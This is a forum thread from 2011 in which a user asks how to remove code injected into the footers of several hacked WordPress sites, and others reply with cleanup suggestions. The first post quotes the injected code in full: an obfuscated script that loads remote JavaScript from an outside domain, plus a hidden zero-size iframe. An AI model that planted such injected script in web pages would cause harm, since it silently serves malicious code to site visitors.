1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HELP! Wordpress blogsites hacked

Discussion in 'Black Hat SEO' started by kyaw2x, Dec 20, 2011.

  1. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    My 2 WP blog site including 1 client WP site was hacked and injected with this code at the footer:

    Code:
    <script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.votistics.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.votistics.com/jquery.js"></scr'+'ipt>'); } </script><iframe src="[URL="http://www.blackhatworld.com/blackhat-seo/view-source:http://pillachil.net46.net/picture/"]http://pillachil.net46.net/picture/[/URL]" width="0%" height="0%"></iframe>
    
    I have re upload new wordpress files and theme files, deactivate plugins but still the code is there, I am not a WP expert so I need help from you guys if ever anyone here encounter this king of code.

    Thanks!
     
  2. BlaqReaper

    BlaqReaper Junior Member

    Joined:
    Sep 7, 2011
    Messages:
    130
    Likes Received:
    207
    Are you sure the code isn't in the footer file of some of your files (especially nulled files)?
     
    • Thanks Thanks x 1
  3. sukataetumba

    sukataetumba Senior Member

    Joined:
    May 25, 2010
    Messages:
    1,109
    Likes Received:
    213
    check the index.php file
     
    • Thanks Thanks x 1
  4. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    Yes, I have checked the files but can't find it.
     
  5. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    The code was placed after <?php wp_footer(); ?>

    No suspicious code found also in index.php
     
  6. jon_xx_x

    jon_xx_x Jr. VIP Jr. VIP

    Joined:
    Nov 15, 2008
    Messages:
    3,118
    Likes Received:
    1,460
    Login to FTP and look what files have been edited recently. There's probably about five of them with that code.
     
    • Thanks Thanks x 1
  7. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    Yes I did that. I search the code in the ff php files but nothing found.

    index.php
    header.php
    functions.php
    footer.php

    I have also installed TAC (Theme Authenticity Checker) and still nothing suspicious code found.
     
  8. gundamwing

    gundamwing Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 18, 2008
    Messages:
    1,274
    Likes Received:
    913
    you need the info of the themes
    or show your website to give more infos
     
    • Thanks Thanks x 1
  9. BlaqReaper

    BlaqReaper Junior Member

    Joined:
    Sep 7, 2011
    Messages:
    130
    Likes Received:
    207
    Do you have notepad++? It can search an entire folder. I'd download it and search through the Wordpress folder. Also it could be encoded so look for suspicious looking string files that don't make sense.
     
    • Thanks Thanks x 1
  10. assassinmarketing

    assassinmarketing Regular Member

    Joined:
    Jun 16, 2010
    Messages:
    248
    Likes Received:
    179
    Occupation:
    SocialPrenuer
    Location:
    Darkside
    What type of security do you have on your site? (Firewalls, php defender etc.)
    please tell me your WP panel login isn't "Admin"
    when you log back in check to see if anyone added themselves with admin status etc.
    there's a lot of solid free WP plugins to help you avoid these situations and remedy them.
     
    • Thanks Thanks x 1
  11. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    I'm sorry I won't disclose my sites here. I'm using free wordpress theme not nulled premium theme.

    Yes, I'm using Notepadd++ in editing code. I also suspect that the code was encoded so I must find longer time to check the files one by one.
     
  12. deserte

    deserte Junior Member

    Joined:
    Apr 26, 2011
    Messages:
    155
    Likes Received:
    93
    Location:
    here
    For future just DON'T use encrypted themes.
     
    • Thanks Thanks x 1
  13. bdtyrone

    bdtyrone Regular Member

    Joined:
    Nov 18, 2008
    Messages:
    216
    Likes Received:
    300
    Follow this guide:

    Code:
    http://www.kimoftheworld.com/01/what-to-do-when-your-blog-is-hacked-steps-in-recovering-your-hacked-wordpress-blog.html
     
    • Thanks Thanks x 1
  14. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    I only secured my blogs with secret keys in wp-config.php
     
  15. gundamwing

    gundamwing Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 18, 2008
    Messages:
    1,274
    Likes Received:
    913
    just set to default wordpress and check
    if there no injected on the footer
    the answer is the themes and you should change the themes
     
    • Thanks Thanks x 1
  16. s4nt0s

    s4nt0s Jr. VIP Jr. VIP Premium Member

    Joined:
    Jul 10, 2009
    Messages:
    3,664
    Likes Received:
    1,940
    Location:
    Texas
    This happened to a couple of my sites recently. There are plenty of people on Fiverr who offer services for hacked WP sites. If you can't figure out yourself, it's worth a shot.
     
    • Thanks Thanks x 1
  17. kkvsam

    kkvsam Senior Member

    Joined:
    Oct 11, 2009
    Messages:
    936
    Likes Received:
    569
    Occupation:
    SYS ADMIN
    Home Page:
    Tell me your url in PM. I'll guide you to fix it for free:D
     
    • Thanks Thanks x 1
  18. kyaw2x

    kyaw2x Regular Member

    Joined:
    Dec 29, 2009
    Messages:
    338
    Likes Received:
    78
    Occupation:
    SEO
    Location:
    Queen City of the South
    Thanks for the offer, I will try to solve first with myself.
    I'll let you know if it won't help.
     
  19. houcemtrigun

    houcemtrigun Registered Member

    Joined:
    Jan 4, 2010
    Messages:
    76
    Likes Received:
    20
    I went through something similar too. Contact your hosting company and ask them to perform a scam.
    It is most likely a database injection. That's why you will not be able to see the code using ftp.
    As I told you, talk to your hosting company. They can restore your hosting to what it was before the hacking and scan for any malicious software.
     
  20. kkvsam

    kkvsam Senior Member

    Joined:
    Oct 11, 2009
    Messages:
    936
    Likes Received:
    569
    Occupation:
    SYS ADMIN
    Home Page:
    as you wish.:D